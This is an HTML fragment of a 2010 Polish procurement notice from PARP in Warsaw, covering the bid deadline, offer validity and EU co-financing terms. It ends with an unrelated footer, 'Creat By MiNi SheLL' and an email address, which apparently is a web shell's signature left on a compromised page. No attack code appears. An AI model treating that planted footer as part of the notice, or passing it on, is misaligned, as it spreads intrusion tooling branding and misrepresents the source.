<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2010 godzina 09:30, miejsce: Polska Agencja Rozwoju Przedsiębiorczości, Kancelaria I piętro, ul. Pańska 81/83, 00-834 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Pomocy Technicznej Programu Operacyjnego Innowacyjna Gospodarka.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com